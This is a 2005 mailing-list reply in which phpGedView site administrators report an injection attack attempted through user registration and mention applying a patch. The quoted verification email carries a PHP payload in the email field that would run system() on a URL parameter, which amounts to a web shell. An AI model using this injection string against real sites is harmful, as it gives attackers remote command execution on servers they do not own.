Re: [Phpgedview-talk] attack attempt
Brought to you by:
canajun2eh,
yalnifj
Menu
▾
▴
Re: [Phpgedview-talk] attack attempt
|
From: Tastiger <tas...@sc...> - 2005-12-20 20:50:26
|
Looks as though we are all getting the same person (s) trying this -
looks as though mine didn't make it through registration
seems as though he is using the same registration name everywhere...
SUNTZU3645
Hello suntzu ...
A request was received at ( snip) to create an account with your
email address (
\';error_reporting(0);if(isset($suntzu)){system($_GET[suntzu]);die(\'HiMaster!\');}echo\'
).
Information about the request is shown under the link below.
Please click on the following link and fill in the requested data to
verify your account and email address.
I have applied the patch anyway - thanks for that!
At 06:31 21/12/2005, you wrote:
>I had a curious user request on my phpGedView site. Looks like they're
>attempting some PHP injection style attack, using PHP code in the email
>address and other field in the user table, like this
|
